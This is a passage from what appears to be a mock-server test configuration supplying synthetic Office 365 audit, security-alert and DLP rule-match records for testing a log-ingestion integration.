(Unknown)\",\"UserId\":\"bob@testsiem.onmicrosoft.com\",\"UserKey\":\"d0e0cfb0-284d-4b0a-83fe-dd543a1c1ed0\",\"CreationTime\":\"2020-02-17T16:59:34\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"Id\":\"d7636db2-859f-437e-8dff-573726578ad7\",\"Operation\":\"TeamsSessionStarted\",\"UserType\":0,\"Workload\":\"MicrosoftTeams\"},\n {\"Category\": \"AccessGovernance\", \"UserKey\": \"SecurityComplianceAlerts\", \"Operation\": \"AlertEntityGenerated\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"AlertEntityId\" : \"asr@testsiem.onmicrosoft.com\", \"Source\" : \"Office 365 Security & Compliance\", \"Name\" : \"Elevation of Exchange admin privilege\", \"AlertType\" : \"System\", \"RecordType\" : 40, \"Version\" : 1, \"Status\" : \"Active\", \"ObjectId\" : \"asr@testsiem.onmicrosoft.com\", \"ResultStatus\" : \"Succeeded\", \"Comments\" : \"New alert\", \"AlertLinks\" : [ { \"AlertLinkHref\" : \"http://example.net/alert\" }, { \"AlertLinkHref\" : \"http://example.net/info\" } ], \"Severity\" : \"Low\", \"Data\" : \"{\\\"etype\\\":\\\"User\\\",\\\"eid\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"tid\\\":\\\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\\\",\\\"ts\\\":\\\"2020-02-14T18:54:45.0000000Z\\\",\\\"te\\\":\\\"2020-02-14T18:54:45.0000000Z\\\",\\\"op\\\":\\\"GrantAdminPermission\\\",\\\"tdc\\\":\\\"1\\\",\\\"suid\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"ut\\\":\\\"Admin\\\",\\\"lon\\\":\\\"GrantAdminPermission\\\"}\", \"Workload\" : \"SecurityComplianceCenter\", \"EntityType\" : \"User\", \"AlertId\" : \"5ba6e029-8b6e-13bd-b800-08d7b180173c\", \"UserId\" : \"SecurityComplianceAlerts\", \"CreationTime\" : \"2020-02-14T19:00:00\", \"Id\" : \"448854d7-81f6-4a06-d31a-08d7b1c1fb2f\", \"UserType\" : 4, \"PolicyId\" : \"17d51759-88e1-40c1-8df3-20bcf2e43057\" },\n { \"Status\" : \"Active\", \"Category\" : \"AccessGovernance\", \"ResultStatus\" : \"Succeeded\", \"ObjectId\" : \"5ba6e029-8b6e-13bd-b800-08d7b180173c\", \"Comments\" : \"New alert\", \"UserKey\" : \"SecurityComplianceAlerts\", \"AlertLinks\" : [ { \"AlertLinkHref\" : \"http://example.net/single\" } ], \"Data\" : \"{\\\"f3u\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"ts\\\":\\\"2020-02-14T18:45:00.0000000Z\\\",\\\"te\\\":\\\"2020-02-14T19:00:00.0000000Z\\\",\\\"op\\\":\\\"GrantAdminPermission\\\",\\\"wl\\\":\\\"Exchange\\\",\\\"tid\\\":\\\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\\\",\\\"tdc\\\":\\\"1\\\",\\\"reid\\\":\\\"23a5e271-e297-4f35-ff57-08d7b17f5bf2\\\",\\\"rid\\\":\\\"f81f1b69-dc60-4ded-918e-e17d5c73b29f\\\",\\\"cid\\\":\\\"17d51759-88e1-40c1-8df3-20bcf2e43057\\\",\\\"ad\\\":\\\"This alert is triggered when someone in your organization becomes an Exchange admin or gets new Exchange admin permissions -V1.0.0.1\\\",\\\"lon\\\":\\\"GrantAdminPermission\\\",\\\"an\\\":\\\"Elevation of Exchange admin privilege\\\",\\\"sev\\\":\\\"Low\\\"}\", \"Severity\" : \"Low\", \"Operation\" : \"AlertTriggered\", \"OrganizationId\" : \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"Source\" : \"Office 365 Security & Compliance\", \"Workload\" : \"SecurityComplianceCenter\", \"Name\" : \"Elevation of Exchange admin privilege\", \"AlertType\" : \"System\", \"AlertId\" : \"5ba6e029-8b6e-13bd-b800-08d7b180173c\", \"RecordType\" : 40, \"Version\" : 1, \"UserId\" : \"SecurityComplianceAlerts\", \"CreationTime\" : \"2020-02-14T19:00:00\", \"Id\" : \"7d6297b5-e4a7-46f0-3c1e-08d7b1c1fb22\", \"UserType\" : 4, \"PolicyId\" : \"17d51759-88e1-40c1-8df3-20bcf2e43057\" },\n { \"Status\" : \"Active\", \"Category\" : \"ThreatManagement\", \"ResultStatus\" : \"Succeeded\", \"ObjectId\" : \"12345678-8b6e-13bd-b800-08d7b180173c\", \"Comments\" : \"This is a phony threat alert\", \"UserKey\" : \"SecurityComplianceAlerts\", \"AlertLinks\" : [], \"Data\" : \"{\\\"something\\\":\\\"blabla\\\"}\", \"Severity\" : \"High\", \"Operation\" : \"AlertTriggered\", \"OrganizationId\" : \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"Source\" : \"Office 365 Security & Compliance\", \"Workload\" : \"SecurityComplianceCenter\", \"Name\" : \"Phony Malware Alert\", \"AlertType\" : \"System\", \"AlertId\" : \"1233344-8b6e-13bd-b800-08d7b180173c\", \"RecordType\" : 40, \"Version\" : 1, \"UserId\" : \"SecurityComplianceAlerts\", \"CreationTime\" : \"2020-02-14T19:00:00\", \"Id\" : \"7d6297b5-e4a7-46f0-3c1e-08d7b1c1fb22\", \"UserType\" : 4, \"PolicyId\" : \"17d51759-88e1-40c1-8df3-20bcf2e43057\", \"AlertEntityId\" : \"Malware/Evil.Malware.B\", \"EntityType\" : \"MalwareFamily\"}, \n {\"Workload\": \"SecurityComplianceCenter\", \"DataType\": \"DataInsightsSubscription\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"CreationTime\": \"2020-02-10T15:13:38\", \"UserId\": \"Service Account\", \"UserType\": 5, \"Version\": 1, \"UserKey\": \"Service Account\", \"Operation\": \"SearchDataInsightsSubscription\", \"Id\": \"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\", \"RecordType\": 52},\n {\"Workload\": \"SecurityComplianceCenter\", \"DataType\": \"DataInsightsSubscription\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"CreationTime\": \"2020-02-12T21:38:38\", \"UserId\": \"Service Account\", \"UserType\": 5, \"Version\": 1, \"UserKey\": \"Service Account\", \"Operation\": \"SearchDataInsightsSubscription\", \"Id\": \"0ff67168-de8c-45fb-3f7d-08d7b003ebdc\", \"RecordType\": 52},\n {\"Workload\": \"SecurityComplianceCenter\", \"RecordType\": 52, \"DataType\": \"DataInsightsSubscription\", \"CreationTime\": \"2020-02-10T15:13:38\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"UserId\": \"Service Account\", \"UserType\": 5, \"Version\": 1, \"UserKey\": \"Service Account\", \"Operation\": \"SearchDataInsightsSubscription\", \"Id\": \"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\"},\n {\"ClientIP\":\"[10.11.12.13]:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"10.11.12.13:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"10.11.12.13\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"::ffff:10.11.12.13\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"[::ffff:10.11.12.13]:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"[2001:db8::abcd]:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"2001:db8::abcd\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"[2001:db8::abcd]\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"[10.11.12.13]\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"localhost\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"[localhost]:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"localhost:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"[cool.client.local]:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"cool.client.local\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"cool.client.local:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"}\n]" - - path: /api/v1.0/tenant-id/activity/feed/subscriptions/content - methods: [GET] - query_params: - contentType: "DLP.All" - startTime: "{startTime:.*}" - endTime: "{endTime:.*}" - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - { - "contentType": "DLP.All", - "contentId": "id1", - "contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/dlp1/activity/feed/audit/id1", - "contentCreated": "{{ .request.vars.endTime }}Z", - "contentExpiration": "2199-05-30T17:35:00.000Z" - } - ] - - path: /api/v1.0/dlp1/activity/feed/audit/id1 - methods: [GET] - query_params: - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - {"Workload": "OneDrive", "SensitiveInfoDetectionIsIncluded": false, "ObjectId": "9cc7be1c-dd5a-4895-b7cb-757de6d51b42", "OrganizationId": "0e1dddce-163e-4b0b-9e33-87ba56ac4655", "UserId": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "CreationTime": "2020-02-25T16:20:15", "UserType": 4, "Version": 1, "PolicyDetails": [{"Rules": [{"Severity": "Low", "RuleId": "c5981414-9f1f-4275-a2df-2fbfb1d03795", "ConditionsMatched": {"SensitiveInformation": [{"Count": 1, "Confidence": 75, "SensitiveType": "cb353f78-2b72-4c3c-8827-92ebe4f69fdf"}]}, "Actions": ["NotifyUser"], "RuleName": "Low volume of content detected U.S. Financial", "ActionParameters": [], "RuleMode": "Enable"}], "PolicyName": "U.S. Financial Data", "PolicyId": "a15b4790-085f-43c1-90ad-853b16cedeec"}], "SharePointMetaData": {"From": "ASR@TESTSIEM2.ONMICROSOFT.COM", "FilePathUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data.docx", "ItemLastModifiedTime": "2020-02-25T16:19:43", "ItemCreationTime": "2020-02-25T15:22:49", "FileName": "Customers Financial Data.docx", "SiteCollectionGuid": "eae3edad-a192-43a9-b317-98d7ea5e3939", "UniqueID": "9cc7be1c-dd5a-4895-b7cb-757de6d51b42", "FileOwner": "Alan Smithee", "SiteCollectionUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com"}, "UserKey": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "Operation": "DLPRuleMatch", "IncidentId": "3066c3c5-eb56-dd03-b000-08d7ba115afd", "Id": "a21f13b9-22b6-405b-bf9e-a07ad8d456da", "RecordType": 11}, - {"Workload": "OneDrive", "SensitiveInfoDetectionIsIncluded": false, "ObjectId": "856386d5-c9cd-46e9-b53b-fd01ed590b68", "OrganizationId": "0e1dddce-163e-4b0b-9e33-87ba56ac4655", "UserId": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "CreationTime": "2020-02-25T16:23:39", "UserType": 4, "Version": 1, "PolicyDetails": [{"Rules": [{"Severity": "High", "RuleId": "7503b92a-67c2-494b-8a46-57ef0d738886", "ConditionsMatched": {"SensitiveInformation": [{"Count": 12, "Confidence": 85, "SensitiveType": "50842eb7-edc8-4019-85dd-5a5c1f2bb085"}, {"Count": 1, "Confidence": 75, "SensitiveType": "cb353f78-2b72-4c3c-8827-92ebe4f69fdf"}]}, "Actions": ["BlockAccess", "NotifyUser", "GenerateIncidentReport"], "RuleName": "High volume of content detected U.S. Financial", "ActionParameters": ["GenerateIncidentReport:SiteAdmin"], "RuleMode": "Enable"}], "PolicyName": "U.S. Financial Data", "PolicyId": "a15b4790-085f-43c1-90ad-853b16cedeec"}], "SharePointMetaData": {"From": "ASR@TESTSIEM2.ONMICROSOFT.COM", "FilePathUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data%20Copy.docx", "ItemLastModifiedTime": "2020-02-25T16:21:44", "SiteCollectionUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com", "ItemCreationTime": "2020-02-25T16:21:50", "FileName": "Customers Financial Data Copy.docx", "SiteCollectionGuid": "eae3edad-a192-43a9-b317-98d7ea5e3939", "UniqueID": "856386d5-c9cd-46e9-b53b-fd01ed590b68", "FileOwner": "Alan Smithee"}, "UserKey": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "Operation": "DLPRuleMatch", "IncidentId": "eeeb7b44-fc69-c19f-b000-08d7ba115afd", "Id": "eb8259c8-d2c2-449d-bd35-5c8a033eb629", "RecordType": 11}, - {"Workload": "OneDrive", "RecordType": 11, "ObjectId": "856386d5-c9cd-46e9-b53b-fd01ed590b68", "OrganizationId": "0e1dddce-163e-4b0b-9e33-87ba56ac4655", "UserId": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "CreationTime": "2020-02-25T16:23:39", "UserType": 4, "Version": 1, "PolicyDetails": [{"Rules": [{"Severity": "Low", "RuleId": "c5981414-9f1f-4275-a2df-2fbfb1d03795", "ConditionsMatched": {"SensitiveInformation": [{"Count": 12, "Confidence": 85, "SensitiveType": "50842eb7-edc8-4019-85dd-5a5c1f2bb085"}, {"Count": 1, "Confidence": 75, "SensitiveType": "cb353f78-2b72-4c3c-8827-92ebe4f69fdf"}]}, "Actions": ["NotifyUser"], "RuleName": "Low volume of content detected U.S. Financial", "ActionParameters": [], "RuleMode": "Enable"}], "PolicyName": "U.S. Financial Data", "PolicyId": "a15b4790-085f-43c1-90ad-853b16cedeec"}], "SharePointMetaData": {"From": "ASR@TESTSIEM2.ONMICROSOFT.COM", "FilePathUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data%20Copy.docx", "ItemLastModifiedTime": "2020-02-25T16:21:44", "ItemCreationTime": "2020-02-25T16:21:50", "FileName": "Customers Financial Data Copy.docx", "SiteCollectionGuid": "eae3edad-a192-43a9-b317-98d7ea5e3939", "UniqueID": "856386d5-c9cd-46e9-b53b-fd01ed590b68", "FileOwner": "Alan Smithee", "SiteCollectionUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com"}, "UserKey": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "Operation": "DLPRuleMatch", "IncidentId": "eeeb7b44-fc69-c19f-b000-08d7ba115afd", "Id": "50a90c83-7e15-4679-8778-d9dd30927e66", "SensitiveInfoDetectionIsIncluded": false}, - {"Workload": "OneDrive", "RecordType": 11, "ObjectId": "9cc7be1c-dd5a-4895-b7cb-757de6d51b42", "OrganizationId": "0e1dddce-163e-4b0b-9e33-87ba56ac4655", "CreationTime": "2020-02-25T16:22:22", "UserId": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "UserType": 4, "Version": 1, "PolicyDetails": [{"Rules": [{"Severity": "High", "RuleId": "7503b92a-67c2-494b-8a46-57ef0d738886", "ConditionsMatched": {"SensitiveInformation": [{"Count": 12, "Confidence": 85, "SensitiveType": "50842eb7-edc8-4019-85dd-5a5c1f2bb085"}, {"Count": 1, "Confidence": 75, "SensitiveType": "cb353f78-2b72-4c3c-8827-92ebe4f69fdf"}]}, "Actions": ["BlockAccess", "NotifyUser", "GenerateIncidentReport"], "RuleName": "High volume of content detected U.S. Financial", "ActionParameters": ["GenerateIncidentReport:SiteAdmin"], "RuleMode": "Enable"}], "PolicyName": "U.S. Financial Data", "PolicyId": "a15b4790-085f-43c1-90ad-853b16cedeec"}], "SharePointMetaData": {"From": "ASR@TESTSIEM2.ONMICROSOFT.COM", "FilePathUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data.docx", "ItemLastModifiedTime": "2020-02-25T16:21:44", "ItemCreationTime": "2020-02-25T15:22:49", "SiteCollectionUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com", "SiteCollectionGuid": "eae3edad-a192-43a9-b317-98d7ea5e3939", "UniqueID": "9cc7be1c-dd5a-4895-b7cb-757de6d51b42", "FileOwner": "Alan Smithee", "FileName": "Customers Financial Data.docx"}, "UserKey": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "Operation": "DLPRuleMatch", "IncidentId": "3066c3c5-eb56-dd03-b000-08d7ba115afd", "Id": "59652f9a-087c-4b65-b88c-b293ade34202", "SensitiveInfoDetectionIsIncluded": false}, - {"Workload": "OneDrive", "RecordType": 11, "ObjectId": "f026407b-090a-4c15-99b5-09851842d96d", "OrganizationId": "0e1dddce-163e-4b0b-9e33-87ba56ac4655", "UserId": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "CreationTime": "2020-02-26T10:13:48", "UserType": 4, "Version": 1, "PolicyDetails": [{"Rules": [{"Severity": "High", "RuleId": "bc4d376f-b038-4695-9362-609d32f963cf", "ConditionsMatched": {"SensitiveInformation": [{"Count": 42, "Confidence": 85, "SensitiveType": "50842eb7-edc8-4019-85dd-5a5c1f2bb085"}, {"Count": 23, "Confidence": 85, "SensitiveType": "0e9b3178-9678-47dd-a509-37222ca96b42"}]}, "Actions": ["BlockAccess", "NotifyUser", "GenerateIncidentReport"], "RuleName": "High volume of content detected France Financial", "ActionParameters": ["GenerateIncidentReport:SiteAdmin"], "RuleMode": "Enable"}], "PolicyName": "Financial Data Detection", "PolicyId": "08745d02-5d45-48bd-98e1-8199ab1efdbe"}], "SharePointMetaData": {"From": "ASR@TESTSIEM2.ONMICROSOFT.COM", "FilePathUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/INTERNAL%20CREDIT%20CARD%20NUMBERS.docx", "ItemLastModifiedTime": "2020-02-26T09:46:23", "SiteCollectionUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com", "ItemCreationTime": "2020-02-26T09:44:40", "FileName": "INTERNAL CREDIT CARD NUMBERS.docx", "SiteCollectionGuid": "eae3edad-a192-43a9-b317-98d7ea5e3939", "UniqueID": "f026407b-090a-4c15-99b5-09851842d96d", "FileOwner": "Alan Smithee"}, "UserKey": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "Operation": "DLPRuleMatch", "IncidentId": "f7295114-e601-f2b6-8800-08d7baa56f8b", "Id": "d69c6758-f210-43bd-bac1-563adef4b4cf", "SensitiveInfoDetectionIsIncluded": false}, - {"Workload": "SharePoint", "SensitiveInfoDetectionIsIncluded": false, "OrganizationId": "0e1dddce-163e-4b0b-9e33-87ba56ac4655", "UserId": "DLPAgent", "CreationTime": "2020-02-26T12:39:40", "UserType": 4, "Version": 1, "PolicyDetails": [{"Rules": [{"Severity": "High", "RuleId": "121c85c3-b2b2-4d5b-af11-b1d1bc0b36fd", "RuleName": "Low volume of content detected France Financial", "Actions": ["NotifyUser", "GenerateAlert"], "ConditionsMatched": {"SensitiveInformation": [{"Count": 42, "Confidence": 85, "SensitiveType": "50842eb7-edc8-4019-85dd-5a5c1f2bb085"}, {"Count": 2, "Confidence": 85, "SensitiveType": "0e9b3178-9678-47dd-a509-37222ca96b42"}]}, "ActionParameters": ["GenerateAlert:asr@testsiem2.onmicrosoft.com"], "RuleMode": "Enable"}], "PolicyName": "Financial Data Detection", "PolicyId": "08745d02-5d45-48bd-98e1-8199ab1efdbe"}], "SharePointMetaData": {"From": "alice@testsiem2.onmicrosoft.com", "UniqueID": "3ace820e-9358-4520-9df6-5bd65602cef0", "FilePathUrl": "https://testsiem2.sharepoint.com/sites/Internalcommunications/Shared%20Documents/Document.docx", "ItemLastModifiedTime": "2020-02-26T09:56:12", "SiteCollectionUrl": "https://testsiem2.sharepoint.com/sites/Internalcommunications", "ItemCreationTime": "2020-02-26T09:55:38", "SiteCollectionGuid": "4aaa3319-df17-4ea0-a142-42cf204cfc62", "FileSize": 35920, "IsViewableByExternalUsers": false, "FileOwner": "alice@testsiem2.onmicrosoft.com", "FileName": "Document.docx"}, "UserKey": "DLPAgent", "Operation": "DLPRuleMatch", "IncidentId": "0ae82be2-e321-ab52-d000-08d7bab8fe55", "Id": "93585ace-96eb-4af1-fdb2-08d7bab8f2bd", "RecordType": 11}, - {"Workload": "SharePoint", "SensitiveInfoDetectionIsIncluded": false, "OrganizationId": "0e1dddce-163e-4b0b-9e33-87ba56ac4655", "UserId": "DLPAgent", "CreationTime": "2020-02-26T12:39:40", "UserType": 4, "Version": 1, "PolicyDetails": [{"Rules": [{"Severity": "High", "RuleId": "121c85c3-b2b2-4d5b-af11-b1d1bc0b36fd", "ConditionsMatched": {"SensitiveInformation": [{"Count": 42, "Confidence": 85, "SensitiveType": "50842eb7-edc8-4019-85dd-5a5c1f2bb085"}, {"Count": 2, "Confidence": 85, "SensitiveType": "0e9b3178-9678-47dd-a509-37222ca96b42"}]}, "Actions": ["NotifyUser", "GenerateAlert"], "RuleName": "Low volume of content detected France Financial", "ActionParameters": ["GenerateAlert:asr@testsiem2.onmicrosoft.com"], "RuleMode": "Enable"}], "PolicyName": "Financial Data Detection", "PolicyId": "08745d02-5d45-48bd-98e1-8199ab1efdbe"}], "SharePointMetaData": {"From": "alice@testsiem2.onmicrosoft.com", "IsViewableByExternalUsers": false, "FilePathUrl": "https://testsiem2.sharepoint.com/sites/Internalcommunications/Shared%20Documents/Document.docx", "ItemLastModifiedTime": "2020-02-26T09:56:12", "SiteCollectionUrl": "https://testsiem2.sharepoint.com/sites/Internalcommunications", "ItemCreationTime": "2020-02-26T09:55:38", "FileName": "Document.docx", "SiteCollectionGuid": "4aaa3319-df17-4ea0-a142-42cf204cfc62", "FileSize": 35920, "UniqueID": "3ace820e-9358-4520-9df6-5bd65602cef0", "FileOwner": "alice@testsiem2.onmicrosoft.com"}, "UserKey": "DLPAgent", "Operation": "DLPRuleMatch", "IncidentId": "0ae82be2-e321-ab52-d000-08d7bab8fe55", "Id": "93585ace-96eb-4af1-fdb2-08d7bab8f2bd", "RecordType": 11}, - {"Workload":"Exchange","SensitiveInfoDetectionIsIncluded":false,"ObjectId":"","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","CreationTime":"2020-02-24T20:11:15","UserId":"DlpAgent","UserType":4,"Version":1,"PolicyDetails":[{"Rules":[{"Severity":"High","RuleId":"51e3d97a-e159-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"High volume of content detected test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"},{"Severity":"Medium","RuleId":"51e3d97a-1234-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"Mid volume of content detected test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"}],"PolicyName":"test","PolicyId":"88956b36-45b3-4828-bf53-78603c0e5f58"}],"ExchangeMetaData":{"From":"asr@testsiem2.onmicrosoft.com","CC":["asr@example.net"],"BCC":[],"To":["asr@example.org"],"FileSize":13405,"UniqueID":"8e103f2f-b293-4062-38b8-08d7b965b2fa","MessageID":"","RecipientCount":2,"Sent":"2020-02-24T20:11:14","Subject":"Here's the phony data"},"UserKey":"1153801116545789462","Operation":"DlpRuleMatch","IncidentId":"c1dc582b-fa61-6020-1800-08d7b966ec64","Id":"d5a0e7d9-e06f-498c-8413-eb83b7dbd516","RecordType":13}, - {"Workload":"Exchange","SensitiveInfoDetectionIsIncluded":false,"ObjectId":"","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","CreationTime":"2020-02-24T20:11:15","UserId":"DlpAgent","UserType":4,"Version":1,"PolicyDetails":[{"Rules":[{"Severity":"High","RuleId":"51e3d97a-e159-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"High volume of content detected test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"},{"Severity":"Medium","RuleId":"51e3d97a-1234-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"Mid volume of content detected test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"}],"PolicyName":"test","PolicyId":"88956b36-45b3-4828-bf53-78603c0e5f58"}],"ExchangeMetaData":{"From":"asr@testsiem2.onmicrosoft.com","CC":["asr@example.net"],"BCC":[],"To":["asr@example.org"],"FileSize":13405,"UniqueID":"8e103f2f-b293-4062-38b8-08d7b965b2fa","MessageID":"","RecipientCount":2,"Sent":"2020-02-24T20:11:14","Subject":"Here's the phony data"},"UserKey":"1153801116545789462","Operation":"DlpRuleUndo","IncidentId":"c1dc582b-fa61-6020-1800-08d7b966ec64","Id":"d5a0e7d9-e06f-498c-8413-eb83b7dbd516","RecordType":13}, - {"Workload":"Exchange","SensitiveInfoDetectionIsIncluded":false,"ObjectId":"","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","CreationTime":"2020-02-24T20:11:15","UserId":"DlpAgent","UserType":4,"Version":1,"ExceptionInfo":"{ \"Justification\": \"I really need to share those files\" }","PolicyDetails":[{"Rules":[{"Severity":"High","RuleId":"51e3d97a-e159-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"High volume of content detected 